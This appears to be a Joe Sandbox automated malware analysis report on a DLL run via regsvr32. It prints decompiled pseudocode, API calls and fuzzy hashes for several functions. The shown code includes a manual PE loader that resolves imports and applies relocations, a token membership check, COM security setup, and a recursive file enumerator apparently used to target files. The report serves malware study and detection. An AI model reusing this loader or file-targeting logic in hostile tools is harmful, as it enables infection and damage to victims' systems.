        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: Sleeplstrcmpi
        • String ID:
        • API String ID: 1261054337-0
        • Opcode ID: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
        • Instruction ID: cde0d477192250e791ba25b7cb0ca9c4b7eae4faf087914376a22588bee842ac
        • Opcode Fuzzy Hash: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
        • Instruction Fuzzy Hash: 21018031600709EFEB10DF69C884D5AB7E5FF843A4725C47AE95A8B215D730E942DB50
        Uniqueness

        Uniqueness Score: -1.00%

        Function 10005E96, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 375 10005e96-10005eb5 ExitProcess
        C-Code - Quality: 100%
        			E10005E96() {
				intOrPtr _t3;

				_t3 =  *0x1001e684; // 0x219faa0
				 *((intOrPtr*)(_t3 + 0x2c))( *0x1001e6a8, 0xffffffff);
				ExitProcess(0);
			}




        0x10005e96
        0x10005ea3
        0x10005ead

        APIs
        • ExitProcess.KERNEL32(00000000), ref: 10005EAD
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: ExitProcess
        • String ID:
        • API String ID: 621844428-0
        • Opcode ID: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
        • Instruction ID: 9fe5a48d1d7df1d44c8ff89900a8b99800cce3c20b8b2062506d45ae6f81fc06
        • Opcode Fuzzy Hash: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
        • Instruction Fuzzy Hash: D4C002712151A1AFEA409BA4CD88F0877A1AB68362F9282A5F5259A1F6CA30D8009B11
        Uniqueness

        Uniqueness Score: -1.00%

        Function 100085EF, Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 377 100085ef-10008603 HeapCreate
        C-Code - Quality: 100%
        			E100085EF() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0x1001e768 = _t1;
				return _t1;
			}




        0x100085f8
        0x100085fe
        0x10008603

        APIs
        • HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: CreateHeap
        • String ID:
        • API String ID: 10892065-0
        • Opcode ID: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
        • Instruction ID: f703af9baad619bee9f37dfa55c6143b3da77678d96310d0b12c6411cce6613a
        • Opcode Fuzzy Hash: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
        • Instruction Fuzzy Hash: B9B012B0A8471096F2901B204C86B047550A308B0AF308001F708581D0C6B05104CB14
        Uniqueness

        Uniqueness Score: -1.00%

        Function 1000BA62, Relevance: 1.3, APIs: 1, Instructions: 82COMMON
        Download Yara Rule
        C-Code - Quality: 47%
        			E1000BA62(void* __ecx, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr _t34;
				char _t37;
				union _TOKEN_INFORMATION_CLASS _t44;
				char _t45;
				intOrPtr* _t48;

				_t37 = 0;
				_v28 = 0x500;
				_t45 = 0;
				_v32 = 0;
				_t20 = E1000B946(__ecx);
				_v16 = _t20;
				if(_t20 != 0) {
					_push( &_v24);
					_t44 = 2;
					_t21 = E1000B998(_t44); // executed
					_t48 = _t21;
					_v20 = _t48;
					if(_t48 == 0) {
						L10:
						CloseHandle(_v16);
						if(_t48 != 0) {
							E1000861A( &_v20, _t37);
						}
						return _t45;
					}
					_push( &_v12);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x220);
					_push(0x20);
					_push(2);
					_push( &_v32);
					_t29 =  *0x1001e68c; // 0x219fc68
					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
						goto L10;
					}
					if( *_t48 <= 0) {
						L9:
						_t31 =  *0x1001e68c; // 0x219fc68
						 *((intOrPtr*)(_t31 + 0x10))(_v12);
						_t37 = 0;
						goto L10;
					}
					_t9 = _t48 + 4; // 0x4
					_t33 = _t9;
					_v8 = _t33;
					while(1) {
						_push(_v12);
						_push( *_t33);
						_t34 =  *0x1001e68c; // 0x219fc68
						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
							break;
						}
						_t37 = _t37 + 1;
						_t33 = _v8 + 8;
						_v8 = _t33;
						if(_t37 <  *_t48) {
							continue;
						}
						goto L9;
					}
					_t45 = 1;
					goto L9;
				}
				return _t20;
			}




















        0x1000ba69
        0x1000ba6b
        0x1000ba72
        0x1000ba74
        0x1000ba77
        0x1000ba7c
        0x1000ba81
        0x1000ba8b
        0x1000ba8e
        0x1000ba91
        0x1000ba96
        0x1000ba98
        0x1000ba9e
        0x1000bafe
        0x1000bb06
        0x1000bb0c
        0x1000bb13
        0x1000bb19
        0x00000000
        0x1000bb1a
        0x1000baa3
        0x1000baa4
        0x1000baa5
        0x1000baa6
        0x1000baa7
        0x1000baa8
        0x1000baa9
        0x1000baaa
        0x1000baaf
        0x1000bab1
        0x1000bab6
        0x1000bab7
        0x1000bac1
        0x00000000
        0x00000000
        0x1000bac5
        0x1000baf1
        0x1000baf1
        0x1000baf9
        0x1000bafc
        0x00000000
        0x1000bafc
        0x1000bac7
        0x1000bac7
        0x1000baca
        0x1000bacd
        0x1000bacd
        0x1000bad0
        0x1000bad2
        0x1000badc
        0x00000000
        0x00000000
        0x1000bae1
        0x1000bae2
        0x1000bae5
        0x1000baea
        0x00000000
        0x00000000
        0x00000000
        0x1000baec
        0x1000baf0
        0x00000000
        0x1000baf0
        0x1000bb1f

        APIs
          • Part of subcall function 1000B946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B959
          • Part of subcall function 1000B946: OpenThreadToken.ADVAPI32(00000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B960
          • Part of subcall function 1000B946: GetLastError.KERNEL32(?,?,1000BA7C,74EC17D9,10000000), ref: 1000B967
          • Part of subcall function 1000B946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B980
          • Part of subcall function 1000B946: OpenProcessToken.ADVAPI32(00000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B987
          • Part of subcall function 1000B998: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9B3
          • Part of subcall function 1000B998: GetLastError.KERNEL32(?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9BA
        • CloseHandle.KERNEL32(?,00000000,74EC17D9,10000000), ref: 1000BB06
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: Token$CurrentErrorLastOpenProcessThread$CloseHandleInformation
        • String ID:
        • API String ID: 1020899596-0
        • Opcode ID: 3029ab77cace5704be6ef2a1eb7c1f1fb731f9b7037353be42344427220f5465
        • Instruction ID: 211ecb97cd29a0990eca88f75de2d619fb9b913ff1731f7459bcb712159e1349
        • Opcode Fuzzy Hash: 3029ab77cace5704be6ef2a1eb7c1f1fb731f9b7037353be42344427220f5465
        • Instruction Fuzzy Hash: A5217F71A00615AFEB00DFA9CC85EAEB7F8EF04380F514069F601E7165D770ED008B51
        Uniqueness

        Uniqueness Score: -1.00%

        Function 1000BA05, Relevance: 1.3, APIs: 1, Instructions: 41COMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E1000BA05() {
				signed int _v8;
				signed int _v12;
				intOrPtr _t15;
				void* _t16;
				void* _t18;
				void* _t21;
				intOrPtr _t22;
				void* _t24;
				void* _t30;

				_v8 = _v8 & 0x00000000;
				_t15 =  *0x1001e68c; // 0x219fc68
				_t16 =  *((intOrPtr*)(_t15 + 0x70))(_t24, 8,  &_v8, _t24, _t24);
				if(_t16 != 0) {
					_v12 = _v12 & 0x00000000;
					_t18 = E1000B998(1,  &_v12); // executed
					_t30 = _t18;
					if(_t30 != 0) {
						CloseHandle(_v8);
						_t21 = _t30;
					} else {
						if(_v8 != _t18) {
							_t22 =  *0x1001e684; // 0x219faa0
							 *((intOrPtr*)(_t22 + 0x30))(_v8);
						}
						_t21 = 0;
					}
					return _t21;
				} else {
					return _t16;
				}
			}












        0x1000ba0a
        0x1000ba12
        0x1000ba1a
        0x1000ba1f
        0x1000ba29
        0x1000ba32
        0x1000ba37
        0x1000ba3c
        0x1000ba5a
        0x1000ba5d
        0x1000ba3e
        0x1000ba41
        0x1000ba43
        0x1000ba4b
        0x1000ba4b
        0x1000ba4e
        0x1000ba4e
        0x1000ba61
        0x1000ba22
        0x1000ba22
        0x1000ba22

        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: cf8ea1d0ee699ffff2a7d6578a9032d28315730fc6a38588bf4ed6563c659023
        • Instruction ID: 27834edd58ae92e11893d12f29fcf0d32ff10038b2ecb69362011e86f4a7d187
        • Opcode Fuzzy Hash: cf8ea1d0ee699ffff2a7d6578a9032d28315730fc6a38588bf4ed6563c659023
        • Instruction Fuzzy Hash: 58F06432A10619EFEB10DBA4C98AE9E77F8EB453D9F5280A8F001E7155EB70DE009B51
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        Function 1000D523, Relevance: 7.6, APIs: 5, Instructions: 87commemoryCOMMON
        Download Yara Rule
        C-Code - Quality: 30%
        			E1000D523(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x1001b848, 0, 1, 0x1001b858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E10008604(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}













        0x1000d530
        0x1000d533
        0x1000d536
        0x1000d547
        0x1000d54d
        0x1000d55e
        0x1000d566
        0x1000d5b7
        0x1000d5b7
        0x1000d5bc
        0x1000d5c1
        0x1000d5c1
        0x1000d5c4
        0x1000d5c9
        0x1000d5ce
        0x1000d5ce
        0x1000d5d1
        0x1000d568
        0x1000d569
        0x1000d56f
        0x1000d580
        0x1000d585
        0x00000000
        0x1000d587
        0x1000d594
        0x1000d59c
        0x00000000
        0x1000d59e
        0x1000d5a0
        0x1000d5a8
        0x00000000
        0x1000d5aa
        0x1000d5ad
        0x1000d5b3
        0x1000d5b3
        0x1000d5a8
        0x1000d59c
        0x1000d585
        0x1000d5d6

        APIs
        • CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
        • CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
        • SysAllocString.OLEAUT32(00000000), ref: 1000D569
        • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594
          • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: AllocInitialize$BlanketCreateHeapInstanceProxySecurityString
        • String ID:
        • API String ID: 2855449287-0
        • Opcode ID: 9c71082fa761bd29d2373c9429704b0bd8b8f761e3a30b2ff640eaa1795f1f5f
        • Instruction ID: 5bbdf4e47082d7f099f202f2147c83233ba5ae9393f0558d240139af4bbb2059
        • Opcode Fuzzy Hash: 9c71082fa761bd29d2373c9429704b0bd8b8f761e3a30b2ff640eaa1795f1f5f
        • Instruction Fuzzy Hash: A6210931600255BBEB249B66CC4DE6FBFBCEFC6B55F11415EB901A6290DB70DA00CA30
        Uniqueness

        Uniqueness Score: -1.00%

        Function 10012AEC, Relevance: 6.2, APIs: 4, Instructions: 219libraryloaderCOMMON
        Download Yara Rule
        C-Code - Quality: 52%
        			E10012AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}





























        0x10012afb
        0x10012b01
        0x10012b0a
        0x10012b0d
        0x10012b10
        0x00000000
        0x10012c01
        0x10012c05
        0x10012c07
        0x10012c15
        0x10012d33
        0x10012d3c
        0x10012d3f
        0x10012d43
        0x10012d49
        0x10012d51
        0x10012d51
        0x10012d59
        0x00000000
        0x10012d64
        0x10012c1b
        0x10012c24
        0x10012c32
        0x10012c35
        0x10012c52
        0x10012c59
        0x10012c6b
        0x10012c6b
        0x10012c72
        0x10012c82
        0x10012c9a
        0x10012c84
        0x10012c8c
        0x10012c8c
        0x10012c9d
        0x10012ca1
        0x10012cb1
        0x10012cd4
        0x10012ce6
        0x10012cb3
        0x10012cc7
        0x10012cc7
        0x10012cf0
        0x10012d0c
        0x10012cf2
        0x10012d01
        0x10012d01
        0x10012d14
        0x10012d1d
        0x10012d1d
        0x10012d2b
        0x00000000
        0x10012c74
        0x10012c76
        0x00000000
        0x10012c76
        0x10012c72
        0x00000000
        0x10012c35
        0x10012b18
        0x10012b26
        0x10012b2b
        0x10012b36
        0x10012b39
        0x10012b3d
        0x10012b3f
        0x10012b4f
        0x10012b58
        0x10012b61
        0x10012b69
        0x10012b72
        0x10012b7d
        0x10012b83
        0x10012b86
        0x10012b89
        0x10012b90
        0x10012b97
        0x00000000
        0x00000000
        0x10012ba2
        0x10012bb0
        0x10012bbb
        0x10012bc5
        0x10012bdd
        0x10012bea
        0x10012bea
        0x10012bc7
        0x10012bd2
        0x10012bd2
        0x10012bf1
        0x10012bf1
        0x10012bf9
        0x10012bf9
        0x00000000

        APIs
        • GetModuleHandleA.KERNEL32(?), ref: 10012C4C
        • LoadLibraryA.KERNEL32(?), ref: 10012C65
        • GetProcAddress.KERNEL32(00000000,890CC483), ref: 10012CC1
        • GetProcAddress.KERNEL32(00000000,?), ref: 10012CE0
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: AddressProc$HandleLibraryLoadModule
        • String ID:
        • API String ID: 384173800-0
        • Opcode ID: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
        • Instruction ID: 2edd54a6eb651874f6cc264e5dd0ce055865838d2197d7e71e48a8f46057b6f1
        • Opcode Fuzzy Hash: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
        • Instruction Fuzzy Hash: 62A168B5E00219DFCB40CFA8D881AADBBF1FF08354F108469E915AB351D734EA91CB64
        Uniqueness

        Uniqueness Score: -1.00%

        Function 1000AEB4, Relevance: 3.1, APIs: 2, Instructions: 113fileCOMMON
        Download Yara Rule
        C-Code - Quality: 78%
        			E1000AEB4(void* __ecx, void* __fp0, intOrPtr _a16) {
				char _v12;
				WCHAR* _v16;
				short _v560;
				short _v562;
				struct _WIN32_FIND_DATAW _v608;
				WCHAR* _t27;
				void* _t31;
				int _t36;
				intOrPtr _t37;
				intOrPtr _t44;
				void* _t48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr _t56;
				void* _t61;
				char _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t80;

				_t80 = __fp0;
				_push(0);
				_t51 = __ecx;
				_push(L"\\*");
				_t27 = E100092E5(__ecx);
				_t65 = _t64 + 0xc;
				_v16 = _t27;
				if(_t27 == 0) {
					return _t27;
				}
				_t61 = FindFirstFileW(_t27,  &_v608);
				if(_t61 == 0xffffffff) {
					L18:
					return E1000861A( &_v16, 0xfffffffe);
				}
				_t31 = 0x2e;
				do {
					if(_v608.cFileName != _t31 || _v562 != 0 && (_v562 != _t31 || _v560 != 0)) {
						if((_v608.dwFileAttributes & 0x00000010) != 0) {
							L14:
							_push(0);
							_push( &(_v608.cFileName));
							_push("\\");
							_t62 = E100092E5(_t51);
							_t65 = _t65 + 0x10;
							_v12 = _t62;
							if(_t62 != 0) {
								_t56 =  *0x1001e684; // 0x219faa0
								 *((intOrPtr*)(_t56 + 0xb4))(1);
								_push(1);
								_push(1);
								_push(0);
								E1000AEB4(_t62, _t80, 1, 5, E1000EFAA, _a16);
								_t65 = _t65 + 0x1c;
								E1000861A( &_v12, 0xfffffffe);
							}
							goto L16;
						}
						_t63 = 0;
						do {
							_t10 = _t63 + 0x1001e78c; // 0x0
							_push( *_t10);
							_push( &(_v608.cFileName));
							_t44 =  *0x1001e690; // 0x219fd40
							if( *((intOrPtr*)(_t44 + 0x18))() == 0) {
								goto L12;
							}
							_t48 = E1000EFAA(_t80, _t51,  &_v608, _a16);
							_t65 = _t65 + 0xc;
							if(_t48 == 0) {
								break;
							}
							_t49 =  *0x1001e684; // 0x219faa0
							 *((intOrPtr*)(_t49 + 0xb4))(1);
							L12:
							_t63 = _t63 + 4;
						} while (_t63 < 4);
						if((_v608.dwFileAttributes & 0x00000010) == 0) {
							goto L16;
						}
						goto L14;
					}
					L16:
					_t36 = FindNextFileW(_t61,  &_v608);
					_t31 = 0x2e;
				} while (_t36 != 0);
				_t37 =  *0x1001e684; // 0x219faa0
				 *((intOrPtr*)(_t37 + 0x78))(_t61);
				goto L18;
			}























        0x1000aeb4
        0x1000aec0
        0x1000aec2
        0x1000aec4
        0x1000aeca
        0x1000aecf
        0x1000aed2
        0x1000aed7
        0x1000b011
        0x1000b011
        0x1000aeeb
        0x1000aef0
        0x1000b000
        0x00000000
        0x1000b00c
        0x1000aef8
        0x1000aef9
        0x1000af00
        0x1000af2f
        0x1000af82
        0x1000af82
        0x1000af8a
        0x1000af8b
        0x1000af96
        0x1000af98
        0x1000af9b
        0x1000afa0
        0x1000afa2
        0x1000afaa
        0x1000afb0
        0x1000afb2
        0x1000afb4
        0x1000afc9
        0x1000afce
        0x1000afd7
        0x1000afdd
        0x00000000
        0x1000afa0
        0x1000af31
        0x1000af33
        0x1000af33
        0x1000af33
        0x1000af3f
        0x1000af40
        0x1000af4a
        0x00000000
        0x00000000
        0x1000af57
        0x1000af5c
        0x1000af61
        0x00000000
        0x00000000
        0x1000af63
        0x1000af6a
        0x1000af70
        0x1000af70
        0x1000af73
        0x1000af80
        0x00000000
        0x00000000
        0x00000000
        0x1000af80
        0x1000afde
        0x1000afe6
        0x1000aff0
        0x1000aff0
        0x1000aff7
        0x1000affd
        0x00000000

        APIs
        • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 1000AEE5
        • FindNextFileW.KERNEL32(00000000,?), ref: 1000AFE6
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: FileFind$FirstNext
        • String ID:
        • API String ID: 1690352074-0
        • Opcode ID: f9e1cb566febe833079e4b3b72957263e334003dd3a33dd3f6c3ab431763b655
        • Instruction ID: 241d9436e866cb8d74d7214ef8056216292051dc3c91cda8f0119f884e331b15
        • Opcode Fuzzy Hash: f9e1cb566febe833079e4b3b72957263e334003dd3a33dd3f6c3ab431763b655
        • Instruction Fuzzy Hash: 8E31A47190021A6EFB10DBE4CC89FAA33B9EB047D0F110165F509AA1D5E771EEC4CB65
        Uniqueness

        Uniqueness Score: -1.00%

        Function 10029660, Relevance: 3.1, APIs: 2, Instructions: 84memoryCOMMON
        Download Yara Rule
        APIs
        • GetProcessHeap.KERNEL32(00000000,00000744), ref: 1002966B
        • RtlAllocateHeap.NTDLL(00000000), ref: 10029672
        Memory Dump Source
        • Source File: 00000004.00000002.516656148.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10021000_regsvr32.jbxd
        Similarity
        • API ID: Heap$AllocateProcess
        • String ID:
        • API String ID: 1357844191-0
        • Opcode ID: f0b32d386485ec8b2252e74fa392f6863baef6b9d97772d80ece6e57939d808c
        • Instruction ID: f2d45d7e56076847abda7dacf9d916d46c2c24713d6d1dcbf256efb98a2a20cf
        • Opcode Fuzzy Hash: f0b32d386485ec8b2252e74fa392f6863baef6b9d97772d80ece6e57939d808c
        • Instruction Fuzzy Hash: C8318175A002A08BE7388F39CDEC5A97BF1FBC4316715436AD485A72A5D2BA5881CB60
        Uniqueness

        Uniqueness Score: -1.00%

        Function 1000980C, Relevance: 3.0, APIs: 2, Instructions: 24timeCOMMON
        Download Yara Rule
        APIs
        • GetSystemTimeAsFileTime.KERNEL32(?,?,10005FAF), ref: 10009819
        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10009839
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
        • String ID:
        • API String ID: 1518329722-0
        • Opcode ID: e28efd3bc395d1b39df08d097cd77ac4fd9f2a4dd6740d30e2db242414d57b87
        • Instruction ID: efe317659bb93fd964c7109caf3faa3499ed084e9357a5ece8a85f8370063b94
